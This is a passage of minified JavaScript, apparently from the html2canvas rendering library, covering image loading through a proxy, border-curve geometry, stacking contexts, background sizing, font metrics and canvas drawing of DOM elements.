gt(Lt)},Lt.onerror=kt,(sE(tt)||_e)&&(Lt.crossOrigin="anonymous"),Lt.src=tt,!0===Lt.complete&&setTimeout(function(){return gt(Lt)},500),dt._options.imageTimeout>0&&setTimeout(function(){return kt("Timed out ("+dt._options.imageTimeout+"ms) loading image")},dt._options.imageTimeout)})];case 3:return[2,_t.sent()]}})})},fe.prototype.has=function(ce){return void 0!==this._cache[ce]},fe.prototype.keys=function(){return Promise.resolve(Object.keys(this._cache))},fe.prototype.proxy=function(ce){var ge=this,_e=this._options.proxy;if(!_e)throw new Error("No proxy defined");var je=ce.substring(0,256);return new Promise(function(tt,dt){var _t=ps.SUPPORT_RESPONSE_TYPE?"blob":"text",gt=new XMLHttpRequest;gt.onload=function(){if(200===gt.status)if("text"===_t)tt(gt.response);else{var Ht=new FileReader;Ht.addEventListener("load",function(){return tt(Ht.result)},!1),Ht.addEventListener("error",function(ui){return dt(ui)},!1),Ht.readAsDataURL(gt.response)}else dt("Failed to proxy resource "+je+" with status code "+gt.status)},gt.onerror=dt;var kt=_e.indexOf("?")>-1?"&":"?";if(gt.open("GET",""+_e+kt+"url="+encodeURIComponent(ce)+"&responseType="+_t),"text"!==_t&&gt instanceof XMLHttpRequest&&(gt.responseType=_t),ge._options.imageTimeout){var Lt=ge._options.imageTimeout;gt.timeout=Lt,gt.ontimeout=function(){return dt("Timed out ("+Lt+"ms) proxying "+je)}}gt.send()})},fe}(),XM=/^data:image\/svg\+xml/i,ph=/^data:image\/.*;base64,/i,oE=/^data:image\/.*/i,rE=function(fe){return ps.SUPPORT_SVG_DRAWING||!Hc(fe)},IC=function(fe){return oE.test(fe)},sE=function(fe){return ph.test(fe)},RC=function(fe){return"blob"===fe.substr(0,4)},Hc=function(fe){return"svg"===fe.substr(-3).toLowerCase()||XM.test(fe)},Fi=function(){function fe(ce,ge){this.type=0,this.x=ce,this.y=ge}return fe.prototype.add=function(ce,ge){return new fe(this.x+ce,this.y+ge)},fe}(),Uf=function(fe,ce,ge){return new Fi(fe.x+(ce.x-fe.x)*ge,fe.y+(ce.y-fe.y)*ge)},W0=function(){function fe(ce,ge,_e,je){this.type=1,this.start=ce,this.startControl=ge,this.endControl=_e,this.end=je}return fe.prototype.subdivide=function(ce,ge){var _e=Uf(this.start,this.startControl,ce),je=Uf(this.startControl,this.endControl,ce),tt=Uf(this.endControl,this.end,ce),dt=Uf(_e,je,ce),_t=Uf(je,tt,ce),gt=Uf(dt,_t,ce);return ge?new fe(this.start,_e,dt,gt):new fe(gt,_t,tt,this.end)},fe.prototype.add=function(ce,ge){return new fe(this.start.add(ce,ge),this.startControl.add(ce,ge),this.endControl.add(ce,ge),this.end.add(ce,ge))},fe.prototype.reverse=function(){return new fe(this.end,this.endControl,this.startControl,this.start)},fe}(),bl=function(fe){return 1===fe.type},cE=function fe(ce){var ge=ce.styles,_e=ce.bounds,je=wo(ge.borderTopLeftRadius,_e.width,_e.height),tt=je[0],dt=je[1],_t=wo(ge.borderTopRightRadius,_e.width,_e.height),gt=_t[0],kt=_t[1],Lt=wo(ge.borderBottomRightRadius,_e.width,_e.height),Ht=Lt[0],ui=Lt[1],Ki=wo(ge.borderBottomLeftRadius,_e.width,_e.height),Ni=Ki[0],Ui=Ki[1],dn=[];dn.push((tt+gt)/_e.width),dn.push((Ni+Ht)/_e.width),dn.push((dt+Ui)/_e.height),dn.push((kt+ui)/_e.height);var ta=Math.max.apply(Math,dn);ta>1&&(tt/=ta,dt/=ta,gt/=ta,kt/=ta,Ht/=ta,ui/=ta,Ni/=ta,Ui/=ta);var na=_e.width-gt,To=_e.height-ui,Mn=_e.width-Ht,qa=_e.height-Ui,Qi=ge.borderTopWidth,ro=ge.borderRightWidth,Yn=ge.borderBottomWidth,Ka=ge.borderLeftWidth,Sr=_n(ge.paddingTop,ce.bounds.width),qc=_n(ge.paddingRight,ce.bounds.width),Gc=_n(ge.paddingBottom,ce.bounds.width),On=_n(ge.paddingLeft,ce.bounds.width);this.topLeftBorderDoubleOuterBox=tt>0||dt>0?hr(_e.left+Ka/3,_e.top+Qi/3,tt-Ka/3,dt-Qi/3,Io.TOP_LEFT):new Fi(_e.left+Ka/3,_e.top+Qi/3),this.topRightBorderDoubleOuterBox=tt>0||dt>0?hr(_e.left+na,_e.top+Qi/3,gt-ro/3,kt-Qi/3,Io.TOP_RIGHT):new Fi(_e.left+_e.width-ro/3,_e.top+Qi/3),this.bottomRightBorderDoubleOuterBox=Ht>0||ui>0?hr(_e.left+Mn,_e.top+To,Ht-ro/3,ui-Yn/3,Io.BOTTOM_RIGHT):new Fi(_e.left+_e.width-ro/3,_e.top+_e.height-Yn/3),this.bottomLeftBorderDoubleOuterBox=Ni>0||Ui>0?hr(_e.left+Ka/3,_e.top+qa,Ni-Ka/3,Ui-Yn/3,Io.BOTTOM_LEFT):new Fi(_e.left+Ka/3,_e.top+_e.height-Yn/3),this.topLeftBorderDoubleInnerBox=tt>0||dt>0?hr(_e.left+2*Ka/3,_e.top+2*Qi/3,tt-2*Ka/3,dt-2*Qi/3,Io.TOP_LEFT):new Fi(_e.left+2*Ka/3,_e.top+2*Qi/3),this.topRightBorderDoubleInnerBox=tt>0||dt>0?hr(_e.left+na,_e.top+2*Qi/3,gt-2*ro/3,kt-2*Qi/3,Io.TOP_RIGHT):new Fi(_e.left+_e.width-2*ro/3,_e.top+2*Qi/3),this.bottomRightBorderDoubleInnerBox=Ht>0||ui>0?hr(_e.left+Mn,_e.top+To,Ht-2*ro/3,ui-2*Yn/3,Io.BOTTOM_RIGHT):new Fi(_e.left+_e.width-2*ro/3,_e.top+_e.height-2*Yn/3),this.bottomLeftBorderDoubleInnerBox=Ni>0||Ui>0?hr(_e.left+2*Ka/3,_e.top+qa,Ni-2*Ka/3,Ui-2*Yn/3,Io.BOTTOM_LEFT):new Fi(_e.left+2*Ka/3,_e.top+_e.height-2*Yn/3),this.topLeftBorderStroke=tt>0||dt>0?hr(_e.left+Ka/2,_e.top+Qi/2,tt-Ka/2,dt-Qi/2,Io.TOP_LEFT):new Fi(_e.left+Ka/2,_e.top+Qi/2),this.topRightBorderStroke=tt>0||dt>0?hr(_e.left+na,_e.top+Qi/2,gt-ro/2,kt-Qi/2,Io.TOP_RIGHT):new Fi(_e.left+_e.width-ro/2,_e.top+Qi/2),this.bottomRightBorderStroke=Ht>0||ui>0?hr(_e.left+Mn,_e.top+To,Ht-ro/2,ui-Yn/2,Io.BOTTOM_RIGHT):new Fi(_e.left+_e.width-ro/2,_e.top+_e.height-Yn/2),this.bottomLeftBorderStroke=Ni>0||Ui>0?hr(_e.left+Ka/2,_e.top+qa,Ni-Ka/2,Ui-Yn/2,Io.BOTTOM_LEFT):new Fi(_e.left+Ka/2,_e.top+_e.height-Yn/2),this.topLeftBorderBox=tt>0||dt>0?hr(_e.left,_e.top,tt,dt,Io.TOP_LEFT):new Fi(_e.left,_e.top),this.topRightBorderBox=gt>0||kt>0?hr(_e.left+na,_e.top,gt,kt,Io.TOP_RIGHT):new Fi(_e.left+_e.width,_e.top),this.bottomRightBorderBox=Ht>0||ui>0?hr(_e.left+Mn,_e.top+To,Ht,ui,Io.BOTTOM_RIGHT):new Fi(_e.left+_e.width,_e.top+_e.height),this.bottomLeftBorderBox=Ni>0||Ui>0?hr(_e.left,_e.top+qa,Ni,Ui,Io.BOTTOM_LEFT):new Fi(_e.left,_e.top+_e.height),this.topLeftPaddingBox=tt>0||dt>0?hr(_e.left+Ka,_e.top+Qi,Math.max(0,tt-Ka),Math.max(0,dt-Qi),Io.TOP_LEFT):new Fi(_e.left+Ka,_e.top+Qi),this.topRightPaddingBox=gt>0||kt>0?hr(_e.left+Math.min(na,_e.width-ro),_e.top+Qi,na>_e.width+ro?0:Math.max(0,gt-ro),Math.max(0,kt-Qi),Io.TOP_RIGHT):new Fi(_e.left+_e.width-ro,_e.top+Qi),this.bottomRightPaddingBox=Ht>0||ui>0?hr(_e.left+Math.min(Mn,_e.width-Ka),_e.top+Math.min(To,_e.height-Yn),Math.max(0,Ht-ro),Math.max(0,ui-Yn),Io.BOTTOM_RIGHT):new Fi(_e.left+_e.width-ro,_e.top+_e.height-Yn),this.bottomLeftPaddingBox=Ni>0||Ui>0?hr(_e.left+Ka,_e.top+Math.min(qa,_e.height-Yn),Math.max(0,Ni-Ka),Math.max(0,Ui-Yn),Io.BOTTOM_LEFT):new Fi(_e.left+Ka,_e.top+_e.height-Yn),this.topLeftContentBox=tt>0||dt>0?hr(_e.left+Ka+On,_e.top+Qi+Sr,Math.max(0,tt-(Ka+On)),Math.max(0,dt-(Qi+Sr)),Io.TOP_LEFT):new Fi(_e.left+Ka+On,_e.top+Qi+Sr),this.topRightContentBox=gt>0||kt>0?hr(_e.left+Math.min(na,_e.width+Ka+On),_e.top+Qi+Sr,na>_e.width+Ka+On?0:gt-Ka+On,kt-(Qi+Sr),Io.TOP_RIGHT):new Fi(_e.left+_e.width-(ro+qc),_e.top+Qi+Sr),this.bottomRightContentBox=Ht>0||ui>0?hr(_e.left+Math.min(Mn,_e.width-(Ka+On)),_e.top+Math.min(To,_e.height+Qi+Sr),Math.max(0,Ht-(ro+qc)),ui-(Yn+Gc),Io.BOTTOM_RIGHT):new Fi(_e.left+_e.width-(ro+qc),_e.top+_e.height-(Yn+Gc)),this.bottomLeftContentBox=Ni>0||Ui>0?hr(_e.left+Ka+On,_e.top+qa,Math.max(0,Ni-(Ka+On)),Ui-(Yn+Gc),Io.BOTTOM_LEFT):new Fi(_e.left+Ka+On,_e.top+_e.height-(Yn+Gc))},Io=(()=>{return(fe=Io||(Io={}))[fe.TOP_LEFT=0]="TOP_LEFT",fe[fe.TOP_RIGHT=1]="TOP_RIGHT",fe[fe.BOTTOM_RIGHT=2]="BOTTOM_RIGHT",fe[fe.BOTTOM_LEFT=3]="BOTTOM_LEFT",Io;var fe})(),hr=function(fe,ce,ge,_e,je){var tt=(Math.sqrt(2)-1)/3*4,dt=ge*tt,_t=_e*tt,gt=fe+ge,kt=ce+_e;switch(je){case Io.TOP_LEFT:return new W0(new Fi(fe,kt),new Fi(fe,kt-_t),new Fi(gt-dt,ce),new Fi(gt,ce));case Io.TOP_RIGHT:return new W0(new Fi(fe,ce),new Fi(fe+dt,ce),new Fi(gt,kt-_t),new Fi(gt,kt));case Io.BOTTOM_RIGHT:return new W0(new Fi(gt,ce),new Fi(gt,ce+_t),new Fi(fe+dt,kt),new Fi(fe,kt));default:return new W0(new Fi(gt,kt),new Fi(gt-dt,kt),new Fi(fe,ce+_t),new Fi(fe,ce))}},U_=function(fe){return[fe.topLeftBorderBox,fe.topRightBorderBox,fe.bottomRightBorderBox,fe.bottomLeftBorderBox]},F0=function(fe){return[fe.topLeftPaddingBox,fe.topRightPaddingBox,fe.bottomRightPaddingBox,fe.bottomLeftPaddingBox]},dE=function fe(ce,ge,_e){this.offsetX=ce,this.offsetY=ge,this.matrix=_e,this.type=0,this.target=6},V0=function fe(ce,ge){this.path=ce,this.target=ge,this.type=1},B0=function fe(ce){this.opacity=ce,this.type=2,this.target=6},qf=function(fe){return 1===fe.type},SC=function(fe,ce){return fe.length===ce.length&&fe.some(function(ge,_e){return ge===ce[_e]})},mE=function fe(ce){this.element=ce,this.inlineLevel=[],this.nonInlineLevel=[],this.negativeZIndex=[],this.zeroOrAutoZIndexOrTransformedOrOpacity=[],this.positiveZIndex=[],this.nonPositionedFloats=[],this.nonPositionedInlineLevel=[]},uE=function(){function fe(ce,ge){if(this.container=ce,this.parent=ge,this.effects=[],this.curves=new cE(this.container),this.container.styles.opacity<1&&this.effects.push(new B0(this.container.styles.opacity)),null!==this.container.styles.transform&&this.effects.push(new dE(this.container.bounds.left+this.container.styles.transformOrigin[0].number,this.container.bounds.top+this.container.styles.transformOrigin[1].number,this.container.styles.transform)),0!==this.container.styles.overflowX){var dt=U_(this.curves),_t=F0(this.curves);SC(dt,_t)?this.effects.push(new V0(dt,6)):(this.effects.push(new V0(dt,2)),this.effects.push(new V0(_t,4)))}}return fe.prototype.getEffects=function(ce){for(var ge=-1===[2,3].indexOf(this.container.styles.position),_e=this.parent,je=this.effects.slice(0);_e;){var tt=_e.effects.filter(function(gt){return!qf(gt)});if(ge||0!==_e.container.styles.position||!_e.parent){if(je.unshift.apply(je,tt),ge=-1===[2,3].indexOf(_e.container.styles.position),0!==_e.container.styles.overflowX){var dt=U_(_e.curves),_t=F0(_e.curves);SC(dt,_t)||je.unshift(new V0(_t,6))}}else je.unshift.apply(je,tt);_e=_e.parent}return je.filter(function(gt){return Tr(gt.target,ce)})},fe}(),ZM=function(fe,ce,ge,_e){fe.container.elements.forEach(function(je){var tt=Tr(je.flags,4),dt=Tr(je.flags,2),_t=new uE(je,fe);Tr(je.styles.display,2048)&&_e.push(_t);var gt=Tr(je.flags,8)?[]:_e;if(tt||dt){var kt=tt||je.styles.isPositioned()?ge:ce,Lt=new mE(_t);if(je.styles.isPositioned()||je.styles.opacity<1||je.styles.isTransformed()){var Ht=je.styles.zIndex.order;if(Ht<0){var ui=0;kt.negativeZIndex.some(function(Ni,Ui){return Ht>Ni.element.container.styles.zIndex.order?(ui=Ui,!1):ui>0}),kt.negativeZIndex.splice(ui,0,Lt)}else if(Ht>0){var Ki=0;kt.positiveZIndex.some(function(Ni,Ui){return Ht>=Ni.element.container.styles.zIndex.order?(Ki=Ui+1,!1):Ki>0}),kt.positiveZIndex.splice(Ki,0,Lt)}else kt.zeroOrAutoZIndexOrTransformedOrOpacity.push(Lt)}else je.styles.isFloating()?kt.nonPositionedFloats.push(Lt):kt.nonPositionedInlineLevel.push(Lt);ZM(_t,Lt,tt?Lt:ge,gt)}else je.styles.isInlineLevel()?ce.inlineLevel.push(_t):ce.nonInlineLevel.push(_t),ZM(_t,ce,ge,gt);Tr(je.flags,8)&&H0(je,gt)})},H0=function(fe,ce){for(var ge=fe instanceof Zm?fe.start:1,_e=fe instanceof Zm&&fe.reversed,je=0;je<ce.length;je++){var tt=ce[je];tt.container instanceof hd&&"number"==typeof tt.container.value&&0!==tt.container.value&&(ge=tt.container.value),tt.listValue=V_(ge,tt.container.styles.listStyleType,!0),ge+=_e?-1:1}},hE=function(fe,ce){switch(ce){case 0:return Ml(fe.topLeftBorderBox,fe.topLeftPaddingBox,fe.topRightBorderBox,fe.topRightPaddingBox);case 1:return Ml(fe.topRightBorderBox,fe.topRightPaddingBox,fe.bottomRightBorderBox,fe.bottomRightPaddingBox);case 2:return Ml(fe.bottomRightBorderBox,fe.bottomRightPaddingBox,fe.bottomLeftBorderBox,fe.bottomLeftPaddingBox);default:return Ml(fe.bottomLeftBorderBox,fe.bottomLeftPaddingBox,fe.topLeftBorderBox,fe.topLeftPaddingBox)}},U0=function(fe,ce){var ge=[];return bl(fe)?ge.push(fe.subdivide(.5,!1)):ge.push(fe),bl(ce)?ge.push(ce.subdivide(.5,!0)):ge.push(ce),ge},Ml=function(fe,ce,ge,_e){var je=[];return bl(fe)?je.push(fe.subdivide(.5,!1)):je.push(fe),bl(ge)?je.push(ge.subdivide(.5,!0)):je.push(ge),bl(_e)?je.push(_e.subdivide(.5,!0).reverse()):je.push(_e),bl(ce)?je.push(ce.subdivide(.5,!1).reverse()):je.push(ce),je},tv=function(fe){var ge=fe.styles;return fe.bounds.add(ge.borderLeftWidth,ge.borderTopWidth,-(ge.borderRightWidth+ge.borderLeftWidth),-(ge.borderTopWidth+ge.borderBottomWidth))},q_=function(fe){var ce=fe.styles,ge=fe.bounds,_e=_n(ce.paddingLeft,ge.width),je=_n(ce.paddingRight,ge.width),tt=_n(ce.paddingTop,ge.width),dt=_n(ce.paddingBottom,ge.width);return ge.add(_e+ce.borderLeftWidth,tt+ce.borderTopWidth,-(ce.borderRightWidth+ce.borderLeftWidth+_e+je),-(ce.borderTopWidth+ce.borderBottomWidth+tt+dt))},G_=function(fe,ce,ge){var _e=function(fe,ce){return 0===fe?ce.bounds:2===fe?q_(ce):tv(ce)}(jf(fe.styles.backgroundOrigin,ce),fe),je=function(fe,ce){return 0===fe?ce.bounds:2===fe?q_(ce):tv(ce)}(jf(fe.styles.backgroundClip,ce),fe),tt=Uc(jf(fe.styles.backgroundSize,ce),ge,_e),dt=tt[0],_t=tt[1],gt=wo(jf(fe.styles.backgroundPosition,ce),_e.width-dt,_e.height-_t);return[nm(jf(fe.styles.backgroundRepeat,ce),gt,tt,_e,je),Math.round(_e.left+gt[0]),Math.round(_e.top+gt[1]),dt,_t]},Gf=function(fe){return tn(fe)&&fe.value===sa.AUTO},oo=function(fe){return"number"==typeof fe},Uc=function(fe,ce,ge){var _e=ce[0],je=ce[1],tt=ce[2],dt=fe[0],_t=fe[1];if(!dt)return[0,0];if(In(dt)&&_t&&In(_t))return[_n(dt,ge.width),_n(_t,ge.height)];var gt=oo(tt);if(tn(dt)&&(dt.value===sa.CONTAIN||dt.value===sa.COVER))return oo(tt)?ge.width/ge.height<tt!=(dt.value===sa.COVER)?[ge.width,ge.width/tt]:[ge.height*tt,ge.height]:[ge.width,ge.height];var Lt=oo(_e),Ht=oo(je),ui=Lt||Ht;if(Gf(dt)&&(!_t||Gf(_t)))return Lt&&Ht?[_e,je]:gt||ui?ui&&gt?[Lt?_e:je*tt,Ht?je:_e/tt]:[Lt?_e:ge.width,Ht?je:ge.height]:[ge.width,ge.height];if(gt){var ta=0,na=0;return In(dt)?ta=_n(dt,ge.width):In(_t)&&(na=_n(_t,ge.height)),Gf(dt)?ta=na*tt:(!_t||Gf(_t))&&(na=ta/tt),[ta,na]}var To=null,Mn=null;if(In(dt)?To=_n(dt,ge.width):_t&&In(_t)&&(Mn=_n(_t,ge.height)),null!==To&&(!_t||Gf(_t))&&(Mn=Lt&&Ht?To/_e*je:ge.height),null!==Mn&&Gf(dt)&&(To=Lt&&Ht?Mn/je*_e:ge.width),null!==To&&null!==Mn)return[To,Mn];throw new Error("Unable to calculate background-size for element")},jf=function(fe,ce){var ge=fe[ce];return void 0===ge?fe[0]:ge},nm=function(fe,ce,ge,_e,je){var tt=ce[0],dt=ce[1],_t=ge[0],gt=ge[1];switch(fe){case 2:return[new Fi(Math.round(_e.left),Math.round(_e.top+dt)),new Fi(Math.round(_e.left+_e.width),Math.round(_e.top+dt)),new Fi(Math.round(_e.left+_e.width),Math.round(gt+_e.top+dt)),new Fi(Math.round(_e.left),Math.round(gt+_e.top+dt))];case 3:return[new Fi(Math.round(_e.left+tt),Math.round(_e.top)),new Fi(Math.round(_e.left+tt+_t),Math.round(_e.top)),new Fi(Math.round(_e.left+tt+_t),Math.round(_e.height+_e.top)),new Fi(Math.round(_e.left+tt),Math.round(_e.height+_e.top))];case 1:return[new Fi(Math.round(_e.left+tt),Math.round(_e.top+dt)),new Fi(Math.round(_e.left+tt+_t),Math.round(_e.top+dt)),new Fi(Math.round(_e.left+tt+_t),Math.round(_e.top+dt+gt)),new Fi(Math.round(_e.left+tt),Math.round(_e.top+dt+gt))];default:return[new Fi(Math.round(je.left),Math.round(je.top)),new Fi(Math.round(je.left+je.width),Math.round(je.top)),new Fi(Math.round(je.left+je.width),Math.round(je.height+je.top)),new Fi(Math.round(je.left),Math.round(je.height+je.top))]}},av="Hidden Text",pE=function(){function fe(ce){this._data={},this._document=ce}return fe.prototype.parseMetrics=function(ce,ge){var _e=this._document.createElement("div"),je=this._document.createElement("img"),tt=this._document.createElement("span"),dt=this._document.body;_e.style.visibility="hidden",_e.style.fontFamily=ce,_e.style.fontSize=ge,_e.style.margin="0",_e.style.padding="0",_e.style.whiteSpace="nowrap",dt.appendChild(_e),je.src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7",je.width=1,je.height=1,je.style.margin="0",je.style.padding="0",je.style.verticalAlign="baseline",tt.style.fontFamily=ce,tt.style.fontSize=ge,tt.style.margin="0",tt.style.padding="0",tt.appendChild(this._document.createTextNode(av)),_e.appendChild(tt),_e.appendChild(je);var _t=je.offsetTop-tt.offsetTop+2;_e.removeChild(tt),_e.appendChild(this._document.createTextNode(av)),_e.style.lineHeight="normal",je.style.verticalAlign="super";var gt=je.offsetTop-_e.offsetTop+2;return dt.removeChild(_e),{baseline:_t,middle:gt}},fe.prototype.getMetrics=function(ce,ge){var _e=ce+" "+ge;return void 0===this._data[_e]&&(this._data[_e]=this.parseMetrics(ce,ge)),this._data[_e]},fe}(),nv=function fe(ce,ge){this.context=ce,this.options=ge},gE=function(fe){function ce(ge,_e){var je=fe.call(this,ge,_e)||this;return je._activeEffects=[],je.canvas=_e.canvas?_e.canvas:document.createElement("canvas"),je.ctx=je.canvas.getContext("2d"),_e.canvas||(je.canvas.width=Math.floor(_e.width*_e.scale),je.canvas.height=Math.floor(_e.height*_e.scale),je.canvas.style.width=_e.width+"px",je.canvas.style.height=_e.height+"px"),je.fontMetrics=new pE(document),je.ctx.scale(je.options.scale,je.options.scale),je.ctx.translate(-_e.x,-_e.y),je.ctx.textBaseline="bottom",je._activeEffects=[],je.context.logger.debug("Canvas renderer initialized ("+_e.width+"x"+_e.height+") with scale "+_e.scale),je}return de(ce,fe),ce.prototype.applyEffects=function(ge){for(var _e=this;this._activeEffects.length;)this.popEffect();ge.forEach(function(je){return _e.applyEffect(je)})},ce.prototype.applyEffect=function(ge){this.ctx.save(),function(fe){return 2===fe.type}(ge)&&(this.ctx.globalAlpha=ge.opacity),function(fe){return 0===fe.type}(ge)&&(this.ctx.translate(ge.offsetX,ge.offsetY),this.ctx.transform(ge.matrix[0],ge.matrix[1],ge.matrix[2],ge.matrix[3],ge.matrix[4],ge.matrix[5]),this.ctx.translate(-ge.offsetX,-ge.offsetY)),qf(ge)&&(this.path(ge.path),this.ctx.clip()),this._activeEffects.push(ge)},ce.prototype.popEffect=function(){this._activeEffects.pop(),this.ctx.restore()},ce.prototype.renderStack=function(ge){return j(this,void 0,void 0,function(){return $(this,function(je){switch(je.label){case 0:return ge.element.container.styles.isVisible()?[4,this.renderStackContent(ge)]:[3,2];case 1:je.sent(),je.label=2;case 2:return[2]}})})},ce.prototype.renderNode=function(ge){return j(this,void 0,void 0,function(){return $(this,function(_e){switch(_e.label){case 0:return Tr(ge.container.flags,16),ge.container.styles.isVisible()?[4,this.renderNodeBackgroundAndBorders(ge)]:[3,3];case 1:return _e.sent(),[4,this.renderNodeContent(ge)];case 2:_e.sent(),_e.label=3;case 3:return[2]}})})},ce.prototype.renderTextWithLetterSpacing=function(ge,_e,je){var tt=this;0===_e?this.ctx.fillText(ge.text,ge.bounds.left,ge.bounds.top+je):im(ge.text).reduce(function(_t,gt){return tt.ctx.fillText(gt,_t,ge.bounds.top+je),_t+tt.ctx.measureText(gt).width},ge.bounds.left)},ce.prototype.createFontStyle=function(ge){var _e=ge.fontVariant.filter(function(dt){return"normal"===dt||"small-caps"===dt}).join(""),je=ov(ge.fontFamily).join(", "),tt=Un(ge.fontSize)?""+ge.fontSize.number+ge.fontSize.unit:ge.fontSize.number+"px";return[[ge.fontStyle,_e,ge.fontWeight,tt,je].join(" "),je,tt]},ce.prototype.renderTextNode=function(ge,_e){return j(this,void 0,void 0,function(){var je,dt,_t,gt,kt,Lt,Ht,ui=this;return $(this,function(Ki){return je=this.createFontStyle(_e),dt=je[1],_t=je[2],this.ctx.font=je[0],this.ctx.direction=1===_e.direction?"rtl":"ltr",this.ctx.textAlign="left",this.ctx.textBaseline="alphabetic",gt=this.fontMetrics.getMetrics(dt,_t),kt=gt.baseline,Lt=gt.middle,Ht=_e.paintOrder,ge.textBounds.forEach(function(Ni){Ht.forEach(function(Ui){switch(Ui){case 0:ui.ctx.fillStyle=tr(_e.color),ui.renderTextWithLetterSpacing(Ni,_e.letterSpacing,kt);var dn=_e.textShadow;dn.length&&Ni.text.trim().length&&(dn.slice(0).reverse().forEach(function(ta){ui.ctx.shadowColor=tr(ta.color),ui.ctx.shadowOffsetX=ta.offsetX.number*ui.options.scale,ui.ctx.shadowOffsetY=ta.offsetY.number*ui.options.scale,ui.ctx.shadowBlur=ta.blur.number,ui.renderTextWithLetterSpacing(Ni,_e.letterSpacing,kt)}),ui.ctx.shadowColor="",ui.ctx.shadowOffsetX=0,ui.ctx.shadowOffsetY=0,ui.ctx.shadowBlur=0),_e.textDecorationLine.length&&(ui.ctx.fillStyle=tr(_e.textDecorationColor||_e.color),_e.textDecorationLine.forEach(function(ta){switch(ta){case 1:ui.ctx.fillRect(Ni.bounds.left,Math.round(Ni.bounds.top+kt),Ni.bounds.width,1);break;case 2:ui.ctx.fillRect(Ni.bounds.left,Math.round(Ni.bounds.top),Ni.bounds.width,1);break;case 3:ui.ctx.fillRect(Ni.bounds.left,Math.ceil(Ni.bounds.top+Lt),Ni.bounds.width,1)}}));break;case 1:_e.webkitTextStrokeWidth&&Ni.text.trim().length&&(ui.ctx.strokeStyle=tr(_e.webkitTextStrokeColor),ui.ctx.lineWidth=_e.webkitTextStrokeWidth,ui.ctx.lineJoin=window.chrome?"miter":"round",ui.ctx.strokeText(Ni.text,Ni.bounds.left,Ni.bounds.top+kt)),ui.ctx.strokeStyle="",ui.ctx.lineWidth=0,ui.ctx.lineJoin="miter"}})}),[2]})})},ce.prototype.renderReplacedElement=function(ge,_e,je){if(je&&ge.intrinsicWidth>0&&ge.intrinsicHeight>0){var tt=q_(ge),dt=F0(_e);this.path(dt),this.ctx.save(),this.ctx.clip(),this.ctx.drawImage(je,0,0,ge.intrinsicWidth,ge.intrinsicHeight,tt.left,tt.top,tt.width,tt.height),this.ctx.restore()}},ce.prototype.renderNodeContent=function(ge){return j(this,void 0,void 0,function(){var _e,je,tt,dt,_t,Lt,Ht,ui,Ni,Ui,dn,ta,na,To,Mn,qa;return $(this,function(Qi){switch(Qi.label){case 0:this.applyEffects(ge.getEffects(4)),je=ge.curves,tt=(_e=ge.container).styles,dt=0,_t=_e.textNodes,Qi.label=1;case 1:return dt<_t.length?[4,this.renderTextNode(_t[dt],tt)]:[3,4];case 2:Qi.sent(),Qi.label=3;case 3:return dt++,[3,1];case 4:if(!(_e instanceof Wc))return[3,8];Qi.label=5;case 5:return Qi.trys.push([5,7,,8]),[4,this.context.cache.match(_e.src)];case 6:return na=Qi.sent(),this.renderReplacedElement(_e,je,na),[3,8];case 7:return Qi.sent(),this.context.logger.error("Error loading image "+_e.src),[3,8];case 8:if(_e instanceof P_&&this.renderReplacedElement(_e,je,_e.canvas),!(_e instanceof rh))return[3,12];Qi.label=9;case 9:return Qi.trys.push([9,11,,12]),[4,this.context.cache.match(_e.svg)];case 10:return na=Qi.sent(),this.renderReplacedElement(_e,je,na),[3,12];case 11:return Qi.sent(),this.context.logger.error("Error loading svg "+_e.svg.substring(0,255)),[3,12];case 12:return _e instanceof lh&&_e.tree?[4,new ce(this.context,{scale:this.options.scale,backgroundColor:_e.backgroundColor,x:0,y:0,width:_e.width,height:_e.height}).render(_e.tree)]:[3,14];case 13:Lt=Qi.sent(),_e.width&&_e.height&&this.ctx.drawImage(Lt,0,0,_e.width,_e.height,_e.bounds.left,_e.bounds.top,_e.bounds.width,_e.bounds.height),Qi.label=14;case 14:if(_e instanceof L_&&(Ht=Math.min(_e.bounds.width,_e.bounds.height),_e.type===sh?_e.checked&&(this.ctx.save(),this.path([new Fi(_e.bounds.left+.39363*Ht,_e.bounds.top+.79*Ht),new Fi(_e.bounds.left+.16*Ht,_e.bounds.top+.5549*Ht),new Fi(_e.bounds.left+.27347*Ht,_e.bounds.top+.44071*Ht),new Fi(_e.bounds.left+.39694*Ht,_e.bounds.top+.5649*Ht),new Fi(_e.bounds.left+.72983*Ht,_e.bounds.top+.23*Ht),new Fi(_e.bounds.left+.84*Ht,_e.bounds.top+.34085*Ht),new Fi(_e.bounds.left+.39363*Ht,_e.bounds.top+.79*Ht)]),this.ctx.fillStyle=tr(Cl),this.ctx.fill(),this.ctx.restore()):_e.type===_s&&_e.checked&&(this.ctx.save(),this.ctx.beginPath(),this.ctx.arc(_e.bounds.left+Ht/2,_e.bounds.top+Ht/2,Ht/4,0,2*Math.PI,!0),this.ctx.fillStyle=tr(Cl),this.ctx.fill(),this.ctx.restore())),V7(_e)&&_e.value.length){switch(ui=this.createFontStyle(tt),Ni=this.fontMetrics.getMetrics(Mn=ui[0],ui[1]).baseline,this.ctx.font=Mn,this.ctx.fillStyle=tr(tt.color),this.ctx.textBaseline="alphabetic",this.ctx.textAlign=j_(_e.styles.textAlign),qa=q_(_e),Ui=0,_e.styles.textAlign){case 1:Ui+=qa.width/2;break;case 2:Ui+=qa.width}dn=qa.add(Ui,0,0,-qa.height/2+1),this.ctx.save(),this.path([new Fi(qa.left,qa.top),new Fi(qa.left+qa.width,qa.top),new Fi(qa.left+qa.width,qa.top+qa.height),new Fi(qa.left,qa.top+qa.height)]),this.ctx.clip(),this.renderTextWithLetterSpacing(new Ff(_e.value,dn),tt.letterSpacing,Ni),this.ctx.restore(),this.ctx.textBaseline="alphabetic",this.ctx.textAlign="left"}if(!Tr(_e.styles.display,2048))return[3,20];if(null===_e.styles.listStyleImage)return[3,19];if(0!==(ta=_e.styles.listStyleImage).type)return[3,18];na=void 0,To=ta.url,Qi.label=15;case 15:return Qi.trys.push([15,17,,18]),[4,this.context.cache.match(To)];case 16:return na=Qi.sent(),this.ctx.drawImage(na,_e.bounds.left-(na.width+10),_e.bounds.top),[3,18];case 17:return Qi.sent(),this.context.logger.error("Error loading list-style-image "+To),[3,18];case 18:return[3,20];case 19:ge.listValue&&-1!==_e.styles.listStyleType&&(Mn=this.createFontStyle(tt)[0],this.ctx.font=Mn,this.ctx.fillStyle=tr(tt.color),this.ctx.textBaseline="middle",this.ctx.textAlign="right",qa=new 